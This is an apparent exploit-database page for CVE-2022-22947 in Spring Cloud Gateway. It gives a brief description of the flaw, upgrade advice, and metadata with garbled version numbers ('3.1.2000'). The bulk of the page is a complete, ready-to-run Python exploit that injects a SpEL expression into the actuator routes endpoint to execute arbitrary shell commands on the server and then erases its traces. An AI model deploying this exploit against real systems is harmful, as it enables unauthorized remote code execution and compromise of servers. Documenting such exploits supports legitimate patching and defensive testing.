Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)

vendor:

Spring Cloud Gateway

by:

Carlos E. Vieira

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: Spring Cloud Gateway

Affected Version From: 3.1.2000

Affected Version To: 3.0.7

Patch Exists: YES

Related CWE: CVE-2022-22947

CPE: a:pivotal_software:spring_cloud_gateway

Metasploit:

Other Scripts:

Tags: cve,cve2022,apache,spring,vmware,actuator,oast,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Nuclei References: https://nvd.nist.gov/vuln/detail/CVE-2022-22947, https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/, https://github.com/wdahlenburg/spring-gateway-demo, https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published, https://tanzu.vmware.com/security/cve-2022-22947

Nuclei Metadata: {'max-request': 3, 'vendor': 'vmware', 'product': 'spring_cloud_gateway'}

Platforms Tested: 3.1.2000

2022

Spring Cloud Gateway 3.1.0 – Remote Code Execution (RCE)

Spring Cloud Gateway versions < 3.0.7 & < 3.1.1 are vulnerable to Remote Code Execution (RCE). An attacker can exploit this vulnerability by sending a malicious payload to the /actuator/gateway/routes/ endpoint, which will execute arbitrary code on the server. The payload is then sent to the /actuator/gateway/refresh endpoint, which will execute the malicious code.

Mitigation:

Upgrade to Spring Cloud Gateway version 3.0.7 or 3.1.1 or later.

Source

Exploit-DB raw data:

# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 03/03/2022
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://spring.io/
# Software Link: https://spring.io/projects/spring-cloud-gateway
# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1
# Tested on: 3.1.0
# CVE : CVE-2022-22947

import random
import string
import requests
import json
import sys
import urllib.parse
import base64

headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}
proxies = {
    'http': 'http://172.29.32.1:8081',
    'https': 'http://172.29.32.1:8081',
}
id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))

def exploit(url, command):
    
    payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}
    
    commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')

    rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)
    if(rbase.status_code == 201):
        print("[+] Stage deployed to /actuator/gateway/routes/"+id)
        print("[+] Executing command...")
        r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)
        if(r.status_code == 200):
            print("[+] getting result...")
            r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)
            if(r.status_code == 200):
                get_response = r.json()
                clean(url, id)
                return get_response['filters'][0].split("'")[1]
            else:
                print("[-] Error: Invalid response")
                clean(url, id)
                exit(1)
        else:
            clean(url, id)
            print("[-] Error executing command")

    
def clean(url, id):
    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)
    if(remove.status_code == 200):
        print("[+] Stage removed!")
    else:
        print("[-] Error: Fail to remove stage")

def banner():
    print("""
    ###################################################
    #                                                 #
    #   Exploit for CVE-2022-22947                    #
    #   - Carlos Vieira (Crowsec)                     #
    #                                                 #
    #   Usage:                                        #
    #   python3 exploit.py <url> <command>            #
    #                                                 #
    #   Example:                                      #
    #   python3 exploit.py http://localhost:8080 'id' #
    #                                                 #
    ###################################################
    """)

def main():
    banner()
    if len(sys.argv) != 3:
        print("[-] Error: Invalid arguments")
        print("[-] Usage: python3 exploit.py <url> <command>")
        exit(1)
    else:
        url = sys.argv[1]
        command = sys.argv[2]
        print(exploit(url, command))
if __name__ == '__main__':
    main()